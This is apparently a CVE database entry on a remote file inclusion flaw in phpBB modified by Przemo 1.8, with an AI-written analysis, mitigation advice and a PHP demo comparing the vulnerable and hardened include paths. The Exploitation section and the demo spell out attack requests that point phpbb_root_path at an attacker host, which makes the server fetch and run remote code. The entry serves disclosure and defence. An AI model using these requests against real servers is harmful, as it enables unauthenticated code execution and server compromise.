CVE-2004-1943
Description
PHP remote file inclusion in album_portal.php of phpBB modified by Przemo 1.8 allows arbitrary code execution via phpbb_root_path parameter.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Vulnerability
The vulnerability exists in album_portal.php of phpBB modified by Przemo version 1.8 (album_portal.php belongs to the photo album mod bundled with the Przemo package; stock phpBB 2.0.x does not ship it). The script uses $phpbb_root_path in an include() without ever initializing or validating it. Specifically, the code $album_root_path = $phpbb_root_path . 'album_mod/'; include($album_root_path . 'album_common.'.$phpEx); lets an attacker choose the include target by supplying phpbb_root_path as an external URL. Because album_portal.php is requested directly rather than through a phpBB page that sets $phpbb_root_path, and because PHP installations of that era typically ran with register_globals enabled, both $phpbb_root_path and $phpEx are populated straight from the query string. The result is remote file inclusion (RFI) of arbitrary PHP code. [1]
Exploitation
An attacker exploits this by sending a crafted HTTP request to the victim's server: http://[victim_host]/album_portal.php?phpbb_root_path=http://[evil_host]/&phpEx=/../../[evil_file.php]. The server then includes http://[evil_host]/album_mod/album_common./../../[evil_file.php]; the attacker's web server normalizes the ../ segments and serves [evil_file.php], whose PHP code runs on the victim. The phpEx parameter is only a convenience for redirecting the fixed 'album_common.' file name; an attacker who simply hosts album_mod/album_common.php on [evil_host] needs no phpEx manipulation at all. No authentication is required; any remote attacker can reach the script. Exploitation depends on the target's PHP configuration: register_globals must be on for the query parameters to become the variables, and URL includes must be permitted (allow_url_fopen on PHP 4 and early PHP 5, allow_url_include on PHP 5.2 and later). [1]
Impact
Successful exploitation allows the attacker to execute arbitrary PHP code on the web server with the privileges of the web server user. This can lead to full compromise of the web application, including data theft, defacement, or further server-side attacks; the reference source rates the issue medium severity, but the practical outcome is unauthenticated remote code execution. [1]
Mitigation
The vendor was not contacted at the time of disclosure. A fix is provided in the advisory: modify album_portal.php to define IN_PHPBB and set $phpbb_root_path = './' before any include, so the root path is hardcoded and the query string can no longer steer the include target. No official vendor patch is mentioned; the fix is a manual code change, and users should apply it or upgrade to a patched version if one becomes available. As defense in depth, disabling register_globals removes the injection of $phpbb_root_path and $phpEx from the request, and disabling allow_url_fopen (PHP 4 and early 5) or leaving allow_url_include off (PHP 5.2+) prevents include() from fetching remote URLs even if another script is exposed the same way. [1]
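The following is an added example, not code from the Przemo package or the advisory. It models the include-path construction described in the Vulnerability section beside the hardened form from the Mitigation section, and runs the request from the Exploitation section through both. The parameter names phpbb_root_path and phpEx are the real ones; the request samples, the host evil.example and the helper function names are constructed for illustration.

```php
<?php
// Added example: models the vulnerable include target built by album_portal.php
// (Przemo 1.8) beside the advisory's hardened form. The $get arrays stand in for
// what register_globals would inject as $phpbb_root_path and $phpEx.

// Vulnerable construction: nothing in the script defines $phpbb_root_path or
// $phpEx first, so with register_globals on they come from the query string.
function vulnerable_include_target(array $get): string
{
    $phpbb_root_path = $get['phpbb_root_path'] ?? '';
    $phpEx           = $get['phpEx'] ?? 'php';
    $album_root_path = $phpbb_root_path . 'album_mod/';
    return $album_root_path . 'album_common.' . $phpEx;
}

// Hardened construction from the advisory: define IN_PHPBB and hardcode the
// root path before any include, so request parameters cannot influence it.
function hardened_include_target(): string
{
    if (!defined('IN_PHPBB')) {
        define('IN_PHPBB', true);
    }
    $phpbb_root_path = './';
    $phpEx           = 'php';
    $album_root_path = $phpbb_root_path . 'album_mod/';
    return $album_root_path . 'album_common.' . $phpEx;
}

// True when PHP would hand the target to a URL stream wrapper (http://, ftp://,
// ...) instead of opening a local file; that is the condition for an RFI.
function is_remote_target(string $target): bool
{
    return (bool) preg_match('#^[a-z][a-z0-9+.-]*://#i', $target);
}

// Constructed request samples (hypothetical attacker host evil.example):
// a plain direct hit, the advisory's phpEx trick, and the simpler variant that
// just hosts album_mod/album_common.php on the attacker's server.
$samples = [
    'album_portal.php',
    'album_portal.php?phpbb_root_path=http://evil.example/&phpEx=/../../evil_file.php',
    'album_portal.php?phpbb_root_path=http://evil.example/',
];

foreach ($samples as $request) {
    // Split off the query string and decode it the way PHP populates $_GET.
    $parts = explode('?', $request, 2);
    parse_str($parts[1] ?? '', $get);

    $vuln = vulnerable_include_target($get);
    $hard = hardened_include_target();

    printf("%s\n  vulnerable includes: %s%s\n  hardened includes:   %s\n",
        $request,
        $vuln,
        is_remote_target($vuln) ? '   <-- remote URL (RFI)' : '',
        $hard);
}
```

Run with php on the command line. The second sample yields http://evil.example/album_mod/album_common./../../evil_file.php from the vulnerable function, which the attacker's web server normalizes to /evil_file.php, while the hardened function returns ./album_mod/album_common.php for every request. The is_remote_target() check is also the condition worth alerting on in web server logs: any phpbb_root_path value that begins with a URL scheme is an attack attempt, not legitimate traffic.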
AI Insight generated on May 24, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
- cpe:2.3:a:phpbb_group:phpbb:2.0.0:*:*:*:*:*:*:*
- cpe:2.3:a:phpbb_group:phpbb:2.0.1:*:*:*:*:*:*:*
- cpe:2.3:a:phpbb_group:phpbb:2.0.2:*:*:*:*:*:*:*
- cpe:2.3:a:phpbb_group:phpbb:2.0.3:*:*:*:*:*:*:*
- cpe:2.3:a:phpbb_group:phpbb:2.0.4:*:*:*:*:*:*:*
- cpe:2.3:a:phpbb_group:phpbb:2.0.5:*:*:*:*:*:*:*
- cpe:2.3:a:phpbb_group:phpbb:2.0.6:*:*:*:*:*:*:*
- cpe:2.3:a:phpbb_group:phpbb:2.0.6c:*:*:*:*:*:*:*
- cpe:2.3:a:phpbb_group:phpbb:2.0.6d:*:*:*:*:*:*:*
- cpe:2.3:a:phpbb_group:phpbb:2.0.7:*:*:*:*:*:*:*
- cpe:2.3:a:phpbb_group:phpbb:2.0.7a:*:*:*:*:*:*:*
- cpe:2.3:a:phpbb_group:phpbb:2.0.8:*:*:*:*:*:*:*
- cpe:2.3:a:phpbb_group:phpbb:2.0.8a:*:*:*:*:*:*:*
- cpe:2.3:a:phpbb_group:phpbb:2.0_beta1:*:*:*:*:*:*:*
- cpe:2.3:a:phpbb_group:phpbb:2.0_rc1:*:*:*:*:*:*:*
- cpe:2.3:a:phpbb_group:phpbb:2.0_rc2:*:*:*:*:*:*:*
- cpe:2.3:a:phpbb_group:phpbb:2.0_rc3:*:*:*:*:*:*:*
- cpe:2.3:a:phpbb_group:phpbb:2.0_rc4:*:*:*:*:*:*:*
- (no CPE) phpBB modified by Przemo, range: =1.8
Patches
No patches discovered yet.
Vulnerability mechanics
AI mechanics synthesis has not run for this CVE yet.
References
- www.securityfocus.com/bid/10177 (NVD: Patch, Vendor Advisory)
- marc.info (NVD)
- exchange.xforce.ibmcloud.com/vulnerabilities/15916 (NVD)
News mentions
No linked articles in our index yet.